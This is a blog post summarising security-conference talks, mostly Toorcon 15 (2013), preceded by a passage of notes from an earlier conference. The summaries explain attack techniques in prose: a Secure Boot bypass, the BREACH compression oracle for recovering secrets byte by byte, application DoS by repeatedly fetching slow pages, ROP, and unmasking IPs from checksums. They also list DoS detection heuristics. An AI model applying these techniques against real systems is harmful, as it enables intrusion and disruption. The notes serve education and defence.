low-hanging fruit (customer service reps and social engineering). Step 2: Policies. Keep policies short and relevant. Generic SANS "security" boilerplate policies don't make sense and are not followed. Focus on acceptable use, data usage, communications, physical security. Step 3: Implementation: keep it simple stupid. Open source, although useful, is not free (implementation cost). Access controls with authentication & authorization for local and remote access. MS Windows has it, otherwise use OpenLDAP, OpenIAM, etc. Application security Everyone tries to reinvent the wheel—use existing static analysis tools. Review high-risk apps and major revisions. Don't run different risk level apps on same system. Assume host/client compromised and use app-level security control. Network security VLAN != segregated because there's too many workarounds. Use explicit firwall rules, active and passive network monitoring (snort is free), disallow end user access to production environment, have a proxy instead of direct Internet access. Also, SSL certificates are not good two-factor auth and SSL does not mean "safe." Operational Controls Have change, patch, asset, & vulnerability management (OSSI is free). For change management, always review code before pushing to production For logging, have centralized security logging for business-critical systems, separate security logging from administrative/IT logging, and lock down log (as it has everything). Monitor with OSSIM (open source). Use intrusion detection, but not just to fulfill a checkbox: build rules from a whitelist perspective (snort). OSSEC has 95% of what you need. Vulnerability management is a QA function when done right: OpenVas and Seccubus are free. Security awareness The reality is users will always click everything. Build real awareness, not compliance driven checkbox, and have it integrated into the culture. Pen test by crowd sourcing—test with logging COSSP http://www.cossp.org/ - Comprehensive Open Source Security Project What Journalists Want: The Investigative Reporters' Perspective on Hacking Dave Maas, San Diego CityBeat Jason Leopold, Truthout.org The difference between hackers and investigative journalists: For hackers, the motivation varies, but method is same, technological specialties. For investigative journalists, it's about one thing—The Story, and they need broad info-gathering skills. J-School in 60 Seconds: Generic formula: Person or issue of pubic interest, new info, or angle. Generic criteria: proximity, prominence, timeliness, human interest, oddity, or consequence. Media awareness of hackers and trends: journalists becoming extremely aware of hackers with congressional debates (privacy, data breaches), demand for data-mining Journalists, use of coding and web development for Journalists, and Journalists busted for hacking (Murdock). Info gathering by investigative journalists include Public records laws. Federal Freedom of Information Act (FOIA) is good, but slow. California Public Records Act is a lot stronger. FOIA takes forever because of foot-dragging—it helps to be specific. Often need to sue (especially FBI). CPRA is faster, and requests can be vague. Dumps and leaks (a la Wikileaks) Journalists want: leads, protecting ourselves, our sources, and adapting tools for news gathering (Google hacking). Anonomity is important to whistleblowers. They want no digital footprint left behind (e.g., email, web log). They don't trust encryption, want to feel safe and secure. Whistleblower laws are very weak—there's no upside for whistleblowers—they have to be very passionate to do it. Accessibility and Security or: How I Learned to Stop Worrying and Love the Halting Problem Anna Shubina, Dartmouth College Anna talked about how accessibility and security are related. Accessibility of digital content (not real world accessibility). mostly refers to blind users and screenreaders, for our purpose. Accessibility is about parsing documents, as are many security issues. "Rich" executable content causes accessibility to fail, and often causes security to fail. For example MS Word has executable format—it's not a document exchange format—more dangerous than PDF or HTML. Accessibility is often the first and maybe only sanity check with parsing. They have no choice because someone may want to read what you write. Google, for example, is very particular about web browser you use and are bad at supporting other browsers. Uses JavaScript instead of links, often requiring mouseover to display content. PDF is a security nightmare. Executible format, embedded flash, JavaScript, etc. 15 million lines of code. Google Chrome doesn't handle PDF correctly, causing several security bugs. PDF has an accessibility checker and PDF tagging, to help with accessibility. But no PDF checker checks for incorrect tags, untagged content, or validates lists or tables. None check executable content at all. The "Halting Problem" is: can one decide whether a program will ever stop? The answer, in general, is no (Rice's theorem). The same holds true for accessibility checkers. Language-theoretic Security says complicated data formats are hard to parse and cannot be solved due to the Halting Problem. W3C Web Accessibility Guidelines: "Perceivable, Operable, Understandable, Robust" Not much help though, except for "Robust", but here's some gems: * all information should be parsable (paraphrasing) * if not parsable, cannot be converted to alternate formats * maximize compatibility in new document formats Executible webpages are bad for security and accessibility. They say it's for a better web experience. But is it necessary to stuff web pages with JavaScript for a better experience? A good example is The Drudge Report—it has hand-written HTML with no JavaScript, yet drives a lot of web traffic due to good content. A bad example is Google News—hidden scrollbars, guessing user input. Solutions: Accessibility and security problems come from same source Expose "better user experience" myth Keep your corner of Internet parsable Remember "Halting Problem"—recognize false solutions (checking and verifying tools) Stop Patching, for Stronger PCI Compliance Adam Brand, protiviti @adamrbrand, http://www.picfun.com/ Adam talked about PCI compliance for retail sales. Take an example: for PCI compliance, 50% of Brian's time (a IT guy), 960 hours/year was spent patching POSs in 850 restaurants. Often applying some patches make no sense (like fixing a browser vulnerability on a server). "Scanner worship" is overuse of vulnerability scanners—it gives a warm and fuzzy and it's simple (red or green results—fix reds). Scanners give a false sense of security. In reality, breeches from missing patches are uncommon—more common problems are: default passwords, cleartext authentication, misconfiguration (firewall ports open). Patching Myths: Myth 1: install within 30 days of patch release (but PCI §6.1 allows a "risk-based approach" instead). Myth 2: vendor decides what's critical (also PCI §6.1). But §6.2 requires user ranking of vulnerabilities instead. Myth 3: scan and rescan until it passes. But PCI §11.2.1b says this applies only to high-risk vulnerabilities. Adam says good recommendations come from NIST 800-40. Instead use sane patching and focus on what's really important. From NIST 800-40: Proactive: Use a proactive vulnerability management process: use change control, configuration management, monitor file integrity. Monitor: start with NVD and other vulnerability alerts, not scanner results. Evaluate: public-facing system? workstation? internal server? (risk rank) Decide:on action and timeline Test: pre-test patches (stability, functionality, rollback) for change control Install: notify, change control, tickets McAfee Secure & Trustmarks — a Hacker's Best Friend Jay James, Shane MacDougall, Tactical Intelligence Inc., Canada "McAfee Secure Trustmark" is a website seal marketed by McAfee. A website gets this badge if they pass their remote scanning. The problem is a removal of trustmarks act as flags that you're vulnerable. Easy to view status change by viewing McAfee list on website or on Google. "Secure TrustGuard" is similar to McAfee. Jay and Shane wrote Perl scripts to gather sites from McAfee and search engines. If their certification image changes to a 1x1 pixel image, then they are longer certified. Their scripts take deltas of scans to see what changed daily. The bottom line is change in TrustGuard status is a flag for hackers to attack your site. Entire idea of seals is silly—you're raising a flag saying if you're vulnerable.

    Read the article

  • Toorcon 15 (2013)

    - by danx
    The Toorcon gang (senior staff): h1kari (founder), nfiltr8, and Geo Introduction to Toorcon 15 (2013) A Tale of One Software Bypass of MS Windows 8 Secure Boot Breaching SSL, One Byte at a Time Running at 99%: Surviving an Application DoS Security Response in the Age of Mass Customized Attacks x86 Rewriting: Defeating RoP and other Shinanighans Clowntown Express: interesting bugs and running a bug bounty program Active Fingerprinting of Encrypted VPNs Making Attacks Go Backwards Mask Your Checksums—The Gorry Details Adventures with weird machines thirty years after "Reflections on Trusting Trust" Introduction to Toorcon 15 (2013) Toorcon 15 is the 15th annual security conference held in San Diego. I've attended about a third of them and blogged about previous conferences I attended here starting in 2003. As always, I've only summarized the talks I attended and interested me enough to write about them. Be aware that I may have misrepresented the speaker's remarks and that they are not my remarks or opinion, or those of my employer, so don't quote me or them. Those seeking further details may contact the speakers directly or use The Google. For some talks, I have a URL for further information. A Tale of One Software Bypass of MS Windows 8 Secure Boot Andrew Furtak and Oleksandr Bazhaniuk Yuri Bulygin, Oleksandr ("Alex") Bazhaniuk, and (not present) Andrew Furtak Yuri and Alex talked about UEFI and Bootkits and bypassing MS Windows 8 Secure Boot, with vendor recommendations. They previously gave this talk at the BlackHat 2013 conference. MS Windows 8 Secure Boot Overview UEFI (Unified Extensible Firmware Interface) is interface between hardware and OS. UEFI is processor and architecture independent. Malware can replace bootloader (bootx64.efi, bootmgfw.efi). Once replaced can modify kernel. Trivial to replace bootloader. Today many legacy bootkits—UEFI replaces them most of them. MS Windows 8 Secure Boot verifies everything you load, either through signatures or hashes. UEFI firmware relies on secure update (with signed update). You would think Secure Boot would rely on ROM (such as used for phones0, but you can't do that for PCs—PCs use writable memory with signatures DXE core verifies the UEFI boat loader(s) OS Loader (winload.efi, winresume.efi) verifies the OS kernel A chain of trust is established with a root key (Platform Key, PK), which is a cert belonging to the platform vendor. Key Exchange Keys (KEKs) verify an "authorized" database (db), and "forbidden" database (dbx). X.509 certs with SHA-1/SHA-256 hashes. Keys are stored in non-volatile (NV) flash-based NVRAM. Boot Services (BS) allow adding/deleting keys (can't be accessed once OS starts—which uses Run-Time (RT)). Root cert uses RSA-2048 public keys and PKCS#7 format signatures. SecureBoot — enable disable image signature checks SetupMode — update keys, self-signed keys, and secure boot variables CustomMode — allows updating keys Secure Boot policy settings are: always execute, never execute, allow execute on security violation, defer execute on security violation, deny execute on security violation, query user on security violation Attacking MS Windows 8 Secure Boot Secure Boot does NOT protect from physical access. Can disable from console. Each BIOS vendor implements Secure Boot differently. There are several platform and BIOS vendors. It becomes a "zoo" of implementations—which can be taken advantage of. Secure Boot is secure only when all vendors implement it correctly. Allow only UEFI firmware signed updates protect UEFI firmware from direct modification in flash memory protect FW update components program SPI controller securely protect secure boot policy settings in nvram protect runtime api disable compatibility support module which allows unsigned legacy Can corrupt the Platform Key (PK) EFI root certificate variable in SPI flash. If PK is not found, FW enters setup mode wich secure boot turned off. Can also exploit TPM in a similar manner. One is not supposed to be able to directly modify the PK in SPI flash from the OS though. But they found a bug that they can exploit from User Mode (undisclosed) and demoed the exploit. It loaded and ran their own bootkit. The exploit requires a reboot. Multiple vendors are vulnerable. They will disclose this exploit to vendors in the future. Recommendations: allow only signed updates protect UEFI fw in ROM protect EFI variable store in ROM Breaching SSL, One Byte at a Time Yoel Gluck and Angelo Prado Angelo Prado and Yoel Gluck, Salesforce.com CRIME is software that performs a "compression oracle attack." This is possible because the SSL protocol doesn't hide length, and because SSL compresses the header. CRIME requests with every possible character and measures the ciphertext length. Look for the plaintext which compresses the most and looks for the cookie one byte-at-a-time. SSL Compression uses LZ77 to reduce redundancy. Huffman coding replaces common byte sequences with shorter codes. US CERT thinks the SSL compression problem is fixed, but it isn't. They convinced CERT that it wasn't fixed and they issued a CVE. BREACH, breachattrack.com BREACH exploits the SSL response body (Accept-Encoding response, Content-Encoding). It takes advantage of the fact that the response is not compressed. BREACH uses gzip and needs fairly "stable" pages that are static for ~30 seconds. It needs attacker-supplied content (say from a web form or added to a URL parameter). BREACH listens to a session's requests and responses, then inserts extra requests and responses. Eventually, BREACH guesses a session's secret key. Can use compression to guess contents one byte at-a-time. For example, "Supersecret SupersecreX" (a wrong guess) compresses 10 bytes, and "Supersecret Supersecret" (a correct guess) compresses 11 bytes, so it can find each character by guessing every character. To start the guess, BREACH needs at least three known initial characters in the response sequence. Compression length then "leaks" information. Some roadblocks include no winners (all guesses wrong) or too many winners (multiple possibilities that compress the same). The solutions include: lookahead (guess 2 or 3 characters at-a-time instead of 1 character). Expensive rollback to last known conflict check compression ratio can brute-force first 3 "bootstrap" characters, if needed (expensive) block ciphers hide exact plain text length. Solution is to align response in advance to block size Mitigations length: use variable padding secrets: dynamic CSRF tokens per request secret: change over time separate secret to input-less servlets Future work eiter understand DEFLATE/GZIP HTTPS extensions Running at 99%: Surviving an Application DoS Ryan Huber Ryan Huber, Risk I/O Ryan first discussed various ways to do a denial of service (DoS) attack against web services. One usual method is to find a slow web page and do several wgets. Or download large files. Apache is not well suited at handling a large number of connections, but one can put something in front of it Can use Apache alternatives, such as nginx How to identify malicious hosts short, sudden web requests user-agent is obvious (curl, python) same url requested repeatedly no web page referer (not normal) hidden links. hide a link and see if a bot gets it restricted access if not your geo IP (unless the website is global) missing common headers in request regular timing first seen IP at beginning of attack count requests per hosts (usually a very large number) Use of captcha can mitigate attacks, but you'll lose a lot of genuine users. Bouncer, goo.gl/c2vyEc and www.github.com/rawdigits/Bouncer Bouncer is software written by Ryan in netflow. Bouncer has a small, unobtrusive footprint and detects DoS attempts. It closes blacklisted sockets immediately (not nice about it, no proper close connection). Aggregator collects requests and controls your web proxies. Need NTP on the front end web servers for clean data for use by bouncer. Bouncer is also useful for a popularity storm ("Slashdotting") and scraper storms. Future features: gzip collection data, documentation, consumer library, multitask, logging destroyed connections. Takeaways: DoS mitigation is easier with a complete picture Bouncer designed to make it easier to detect and defend DoS—not a complete cure Security Response in the Age of Mass Customized Attacks Peleus Uhley and Karthik Raman Peleus Uhley and Karthik Raman, Adobe ASSET, blogs.adobe.com/asset/ Peleus and Karthik talked about response to mass-customized exploits. Attackers behave much like a business. "Mass customization" refers to concept discussed in the book Future Perfect by Stan Davis of Harvard Business School. Mass customization is differentiating a product for an individual customer, but at a mass production price. For example, the same individual with a debit card receives basically the same customized ATM experience around the world. Or designing your own PC from commodity parts. Exploit kits are another example of mass customization. The kits support multiple browsers and plugins, allows new modules. Exploit kits are cheap and customizable. Organized gangs use exploit kits. A group at Berkeley looked at 77,000 malicious websites (Grier et al., "Manufacturing Compromise: The Emergence of Exploit-as-a-Service", 2012). They found 10,000 distinct binaries among them, but derived from only a dozen or so exploit kits. Characteristics of Mass Malware: potent, resilient, relatively low cost Technical characteristics: multiple OS, multipe payloads, multiple scenarios, multiple languages, obfuscation Response time for 0-day exploits has gone down from ~40 days 5 years ago to about ~10 days now. So the drive with malware is towards mass customized exploits, to avoid detection There's plenty of evicence that exploit development has Project Manager bureaucracy. They infer from the malware edicts to: support all versions of reader support all versions of windows support all versions of flash support all browsers write large complex, difficult to main code (8750 lines of JavaScript for example Exploits have "loose coupling" of multipe versions of software (adobe), OS, and browser. This allows specific attacks against specific versions of multiple pieces of software. Also allows exploits of more obscure software/OS/browsers and obscure versions. Gave examples of exploits that exploited 2, 3, 6, or 14 separate bugs. However, these complete exploits are more likely to be buggy or fragile in themselves and easier to defeat. Future research includes normalizing malware and Javascript. Conclusion: The coming trend is that mass-malware with mass zero-day attacks will result in mass customization of attacks. x86 Rewriting: Defeating RoP and other Shinanighans Richard Wartell Richard Wartell The attack vector we are addressing here is: First some malware causes a buffer overflow. The malware has no program access, but input access and buffer overflow code onto stack Later the stack became non-executable. The workaround malware used was to write a bogus return address to the stack jumping to malware Later came ASLR (Address Space Layout Randomization) to randomize memory layout and make addresses non-deterministic. The workaround malware used was to jump t existing code segments in the program that can be used in bad ways "RoP" is Return-oriented Programming attacks. RoP attacks use your own code and write return address on stack to (existing) expoitable code found in program ("gadgets"). Pinkie Pie was paid $60K last year for a RoP attack. One solution is using anti-RoP compilers that compile source code with NO return instructions. ASLR does not randomize address space, just "gadgets". IPR/ILR ("Instruction Location Randomization") randomizes each instruction with a virtual machine. Richard's goal was to randomize a binary with no source code access. He created "STIR" (Self-Transofrming Instruction Relocation). STIR disassembles binary and operates on "basic blocks" of code. The STIR disassembler is conservative in what to disassemble. Each basic block is moved to a random location in memory. Next, STIR writes new code sections with copies of "basic blocks" of code in randomized locations. The old code is copied and rewritten with jumps to new code. the original code sections in the file is marked non-executible. STIR has better entropy than ASLR in location of code. Makes brute force attacks much harder. STIR runs on MS Windows (PEM) and Linux (ELF). It eliminated 99.96% or more "gadgets" (i.e., moved the address). Overhead usually 5-10% on MS Windows, about 1.5-4% on Linux (but some code actually runs faster!). The unique thing about STIR is it requires no source access and the modified binary fully works! Current work is to rewrite code to enforce security policies. For example, don't create a *.{exe,msi,bat} file. Or don't connect to the network after reading from the disk. Clowntown Express: interesting bugs and running a bug bounty program Collin Greene Collin Greene, Facebook Collin talked about Facebook's bug bounty program. Background at FB: FB has good security frameworks, such as security teams, external audits, and cc'ing on diffs. But there's lots of "deep, dark, forgotten" parts of legacy FB code. Collin gave several examples of bountied bugs. Some bounty submissions were on software purchased from a third-party (but bounty claimers don't know and don't care). We use security questions, as does everyone else, but they are basically insecure (often easily discoverable). Collin didn't expect many bugs from the bounty program, but they ended getting 20+ good bugs in first 24 hours and good submissions continue to come in. Bug bounties bring people in with different perspectives, and are paid only for success. Bug bounty is a better use of a fixed amount of time and money versus just code review or static code analysis. The Bounty program started July 2011 and paid out $1.5 million to date. 14% of the submissions have been high priority problems that needed to be fixed immediately. The best bugs come from a small % of submitters (as with everything else)—the top paid submitters are paid 6 figures a year. Spammers like to backstab competitors. The youngest sumitter was 13. Some submitters have been hired. Bug bounties also allows to see bugs that were missed by tools or reviews, allowing improvement in the process. Bug bounties might not work for traditional software companies where the product has release cycle or is not on Internet. Active Fingerprinting of Encrypted VPNs Anna Shubina Anna Shubina, Dartmouth Institute for Security, Technology, and Society (I missed the start of her talk because another track went overtime. But I have the DVD of the talk, so I'll expand later) IPsec leaves fingerprints. Using netcat, one can easily visually distinguish various crypto chaining modes just from packet timing on a chart (example, DES-CBC versus AES-CBC) One can tell a lot about VPNs just from ping roundtrips (such as what router is used) Delayed packets are not informative about a network, especially if far away from the network More needed to explore about how TCP works in real life with respect to timing Making Attacks Go Backwards Fuzzynop FuzzyNop, Mandiant This talk is not about threat attribution (finding who), product solutions, politics, or sales pitches. But who are making these malware threats? It's not a single person or group—they have diverse skill levels. There's a lot of fat-fingered fumblers out there. Always look for low-hanging fruit first: "hiding" malware in the temp, recycle, or root directories creation of unnamed scheduled tasks obvious names of files and syscalls ("ClearEventLog") uncleared event logs. Clearing event log in itself, and time of clearing, is a red flag and good first clue to look for on a suspect system Reverse engineering is hard. Disassembler use takes practice and skill. A popular tool is IDA Pro, but it takes multiple interactive iterations to get a clean disassembly. Key loggers are used a lot in targeted attacks. They are typically custom code or built in a backdoor. A big tip-off is that non-printable characters need to be printed out (such as "[Ctrl]" "[RightShift]") or time stamp printf strings. Look for these in files. Presence is not proof they are used. Absence is not proof they are not used. Java exploits. Can parse jar file with idxparser.py and decomile Java file. Java typially used to target tech companies. Backdoors are the main persistence mechanism (provided externally) for malware. Also malware typically needs command and control. Application of Artificial Intelligence in Ad-Hoc Static Code Analysis John Ashaman John Ashaman, Security Innovation Initially John tried to analyze open source files with open source static analysis tools, but these showed thousands of false positives. Also tried using grep, but tis fails to find anything even mildly complex. So next John decided to write his own tool. His approach was to first generate a call graph then analyze the graph. However, the problem is that making a call graph is really hard. For example, one problem is "evil" coding techniques, such as passing function pointer. First the tool generated an Abstract Syntax Tree (AST) with the nodes created from method declarations and edges created from method use. Then the tool generated a control flow graph with the goal to find a path through the AST (a maze) from source to sink. The algorithm is to look at adjacent nodes to see if any are "scary" (a vulnerability), using heuristics for search order. The tool, called "Scat" (Static Code Analysis Tool), currently looks for C# vulnerabilities and some simple PHP. Later, he plans to add more PHP, then JSP and Java. For more information see his posts in Security Innovation blog and NRefactory on GitHub. Mask Your Checksums—The Gorry Details Eric (XlogicX) Davisson Eric (XlogicX) Davisson Sometimes in emailing or posting TCP/IP packets to analyze problems, you may want to mask the IP address. But to do this correctly, you need to mask the checksum too, or you'll leak information about the IP. Problem reports found in stackoverflow.com, sans.org, and pastebin.org are usually not masked, but a few companies do care. If only the IP is masked, the IP may be guessed from checksum (that is, it leaks data). Other parts of packet may leak more data about the IP. TCP and IP checksums both refer to the same data, so can get more bits of information out of using both checksums than just using one checksum. Also, one can usually determine the OS from the TTL field and ports in a packet header. If we get hundreds of possible results (16x each masked nibble that is unknown), one can do other things to narrow the results, such as look at packet contents for domain or geo information. With hundreds of results, can import as CSV format into a spreadsheet. Can corelate with geo data and see where each possibility is located. Eric then demoed a real email report with a masked IP packet attached. Was able to find the exact IP address, given the geo and university of the sender. Point is if you're going to mask a packet, do it right. Eric wouldn't usually bother, but do it correctly if at all, to not create a false impression of security. Adventures with weird machines thirty years after "Reflections on Trusting Trust" Sergey Bratus Sergey Bratus, Dartmouth College (and Julian Bangert and Rebecca Shapiro, not present) "Reflections on Trusting Trust" refers to Ken Thompson's classic 1984 paper. "You can't trust code that you did not totally create yourself." There's invisible links in the chain-of-trust, such as "well-installed microcode bugs" or in the compiler, and other planted bugs. Thompson showed how a compiler can introduce and propagate bugs in unmodified source. But suppose if there's no bugs and you trust the author, can you trust the code? Hell No! There's too many factors—it's Babylonian in nature. Why not? Well, Input is not well-defined/recognized (code's assumptions about "checked" input will be violated (bug/vunerabiliy). For example, HTML is recursive, but Regex checking is not recursive. Input well-formed but so complex there's no telling what it does For example, ELF file parsing is complex and has multiple ways of parsing. Input is seen differently by different pieces of program or toolchain Any Input is a program input executes on input handlers (drives state changes & transitions) only a well-defined execution model can be trusted (regex/DFA, PDA, CFG) Input handler either is a "recognizer" for the inputs as a well-defined language (see langsec.org) or it's a "virtual machine" for inputs to drive into pwn-age ELF ABI (UNIX/Linux executible file format) case study. Problems can arise from these steps (without planting bugs): compiler linker loader ld.so/rtld relocator DWARF (debugger info) exceptions The problem is you can't really automatically analyze code (it's the "halting problem" and undecidable). Only solution is to freeze code and sign it. But you can't freeze everything! Can't freeze ASLR or loading—must have tables and metadata. Any sufficiently complex input data is the same as VM byte code Example, ELF relocation entries + dynamic symbols == a Turing Complete Machine (TM). @bxsays created a Turing machine in Linux from relocation data (not code) in an ELF file. For more information, see Rebecca "bx" Shapiro's presentation from last year's Toorcon, "Programming Weird Machines with ELF Metadata" @bxsays did same thing with Mach-O bytecode Or a DWARF exception handling data .eh_frame + glibc == Turning Machine X86 MMU (IDT, GDT, TSS): used address translation to create a Turning Machine. Page handler reads and writes (on page fault) memory. Uses a page table, which can be used as Turning Machine byte code. Example on Github using this TM that will fly a glider across the screen Next Sergey talked about "Parser Differentials". That having one input format, but two parsers, will create confusion and opportunity for exploitation. For example, CSRs are parsed during creation by cert requestor and again by another parser at the CA. Another example is ELF—several parsers in OS tool chain, which are all different. Can have two different Program Headers (PHDRs) because ld.so parses multiple PHDRs. The second PHDR can completely transform the executable. This is described in paper in the first issue of International Journal of PoC. Conclusions trusting computers not only about bugs! Bugs are part of a problem, but no by far all of it complex data formats means bugs no "chain of trust" in Babylon! (that is, with parser differentials) we need to squeeze complexity out of data until data stops being "code equivalent" Further information See and langsec.org. USENIX WOOT 2013 (Workshop on Offensive Technologies) for "weird machines" papers and videos.

    Read the article

< Previous Page | 63 64 65 66 67 68  | Next Page >